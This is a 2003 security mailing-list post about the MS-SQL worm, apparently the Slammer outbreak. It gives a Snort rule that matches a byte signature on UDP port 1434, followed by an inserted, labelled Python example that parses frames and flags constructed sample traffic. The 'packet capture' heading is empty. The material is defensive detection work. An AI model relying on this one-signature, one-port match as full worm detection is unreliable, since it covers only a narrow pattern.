[ale] New worm destabilized Internet

Jonathan Rickman jonathan at xcorps.net
Sat Jan 25 22:03:44 EST 2003


For those interested in such things...



Snort Rule to detect SQL Worm:

alert udp $EXTERNAL_NET any -> $HOME_NET 1434 (msg:"MS-SQL Worm Activity"; content:"|04 01 01 01 01 01 01 01|"; classtype:bad-unknown; sid:9994; rev:1;)
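The rule's match condition, implemented in Python over raw Ethernet/IPv4/UDP frames with constructed sample traffic, as an added example that is not part of the original post; the addresses, ports and frame-building helper are assumptions, and the filler bytes are not the worm body.

```python
import struct
from typing import List, NamedTuple, Optional
# Signature from the Snort rule above: UDP to port 1434 with 04 01 01 01 01 01 01 01 in the payload.
SQL_RESOLUTION_PORT = 1434
WORM_SIGNATURE = bytes.fromhex("0401010101010101")

UdpDatagram = NamedTuple("UdpDatagram", [("src", str), ("dst", str), ("sport", int),
                                         ("dport", int), ("payload", bytes)])
def parse_ipv4_udp(frame: bytes) -> Optional[UdpDatagram]:
    """Parse an Ethernet II frame carrying IPv4/UDP; return None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType 0x0800 = IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[0] >> 4 != 4 or ip[9] != 17 or not ihl + 8 <= total_len <= len(ip):
        return None                                      # not IPv4/UDP, or truncated
    sport, dport, ulen = struct.unpack("!HHH", ip[ihl:ihl + 6])
    if ulen < 8 or ihl + ulen > total_len:
        return None                                      # bogus UDP length field
    addr = lambda b: ".".join(str(x) for x in b)
    return UdpDatagram(addr(ip[12:16]), addr(ip[16:20]), sport, dport, ip[ihl + 8:ihl + ulen])

def matches_worm_rule(d: UdpDatagram) -> bool:
    """The rule's test: destination port 1434 and the signature anywhere in the payload."""
    return d.dport == SQL_RESOLUTION_PORT and WORM_SIGNATURE in d.payload

def build_frame(src: str, dst: str, sport: int, dport: int, payload: bytes) -> bytes:
    # Constructed test frame: zero MACs and checksums, which the parser does not verify.
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return b"\x00" * 12 + b"\x08\x00" + ip + udp

# Constructed traffic: signature plus filler (not the worm body); a legitimate SQL Server
# Resolution Service ping (0x02); the signature sent to 1433, which the rule does not
# cover; and a frame cut short, which the parser must reject rather than crash on.
SAMPLE_FRAMES = [
    build_frame("198.51.100.7", "192.0.2.10", 1500, 1434, WORM_SIGNATURE + b"\x01" * 24),
    build_frame("192.0.2.20", "192.0.2.10", 40000, 1434, b"\x02"),
    build_frame("198.51.100.7", "192.0.2.10", 1500, 1433, WORM_SIGNATURE + b"\x01" * 24),
    build_frame("198.51.100.7", "192.0.2.10", 1500, 1434, WORM_SIGNATURE)[:40],
]

def scan(frames: List[bytes]) -> List[str]:
    """One alert line, in the rule's msg wording, per frame that satisfies it."""
    hits = (d for d in map(parse_ipv4_udp, frames) if d is not None and matches_worm_rule(d))
    return [f"MS-SQL Worm Activity {d.src}:{d.sport} -> {d.dst}:{d.dport}" for d in hits]
```

Only the first constructed frame triggers an alert; the port-1433 copy shows why the rule is bound to the SQL Server Resolution Service port rather than to the byte run alone.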


Packet capture from actual attack:



--
Jonathan Rickman
X Corps Security
http://www.xcorps.net

_______________________________________________
Ale mailing list
Ale at ale.org
http://www.ale.org/mailman/listinfo/ale